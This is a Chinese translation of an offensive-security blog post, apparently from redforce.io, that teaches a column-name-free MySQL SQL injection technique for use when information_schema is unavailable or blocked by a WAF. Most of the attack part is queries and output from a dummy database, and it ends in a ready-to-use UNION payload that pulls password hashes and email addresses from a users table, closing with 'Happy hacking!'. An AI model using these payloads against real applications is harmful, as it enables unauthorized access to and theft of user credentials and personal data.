在不知道 MySQL 列名的情况下泄露数据的 SQL 注入技巧
在不知道MySQL(版本号小于5)中列名的情况下提取数据,或者在列入WAF黑名单的情况下在请求中发送information_schema
简介
您可以略过:
您或许会遇到以下这种情况:您必须从MySQL DB中转储某个表中的某些数据,要完成这一目标,您需要知道转储的表名和列名:
例如在版本号小于5的MYSQL,甚至在版本号大于等于5的MYSQL中,WAF将information_schema的任何调用都列进了黑名单,这就是我们讨论的情况。
在这种情况下,获取DB服务器版本甚至DB名称就足以证明该漏洞的严重性。
我们能对于这种漏洞进入更深次的研究,尽可能地获得最高权限。
我们首先暴力破解表名,紧接着暴力破解列名。
我们得到的唯一有用的表名:users 。
我们继续暴力破解列名,只返回一个有效的列名id,这不足以获得进一步的访问权限。
无列名注入
和队友@aboul3la一起,我们创建了一个虚拟SQL DB,用来模拟目标SQL DB,找寻一种在不知道列名的情况下,从表中提取数据的方法。以下方法是基于我们大量的试错之后得到的。
执行以下普通查询将返回用户表内容:
MariaDB [dummydb]> select * from users;
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| id | name | password | email | birthdate | added |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | alias | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | [email protected] | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus | 114fec39a7c9567e8250409d467fed64389a7bee | [email protected] | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | [email protected] | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et | aaaf2b311a1cd97485be716a896f9c09aff55b96 | [email protected] | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | [email protected] | 1991-11-22 | 2005-12-04 20:38:41 |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+选择的列:name, password, email, birthdate, added
下一步是将列名转换为任何可选的已知值,
可以用SQL将其转换为:
MariaDB [dummydb]> select 1,2,3,4,5,6 union select * from users;
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2 | 3 | 4 | 5 | 6 |
| 1 | alias | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | [email protected] | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus | 114fec39a7c9567e8250409d467fed64389a7bee | [email protected] | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | [email protected] | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et | aaaf2b311a1cd97485be716a896f9c09aff55b96 | [email protected] | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | [email protected] | 1991-11-22 | 2005-12-04 20:38:41 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+Great!列:name, password, email, birthdate, added被1,2,3,4,5,6替代,
查询语句SELECT 1、2、3、4、5、6。
下一步是根据新的数值选择数据,可以通过添加表alias,从上一个查询中选择field_number来完成。
使用下面的查询
select `4` from (select 1,2,3,4,5,6 union select * from users)redforce将选择引用email地址列的'4'列,
MariaDB [dummydb]> select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;
+-----------------------------+
| 4 |
+-----------------------------+
| 4 |
| [email protected] |
| [email protected] |
| [email protected] |
| [email protected] |
| [email protected] |
+-----------------------------+
6 rows in set (0.00 sec)将其更改为3将返回password,2将返回name。
将其与我们的注入payload结合成为最终payload。
-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -实际情况实际结合。
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-------+
| author_id | title |
+-----------+-------+
| 1 | alias |
+-----------+-------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------------------------+
| author_id | title |
+-----------+------------------------------------------+
| 1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |
+-----------+------------------------------------------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------+
| author_id | title |
+-----------+------------------------+
| 1 | [email protected] |
+-----------+------------------------+
1 row in set (0.00 sec)
简而言之
您可以通过从目标表中选择所有内容,将列名转换为任何已知的值,然后使用这些值作为SELECT查询中的字段来实现这一点。
最终payload
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title |
+-----------+-----------------------------------------------------------------+
| 1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:[email protected] |Happy hacking!
https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/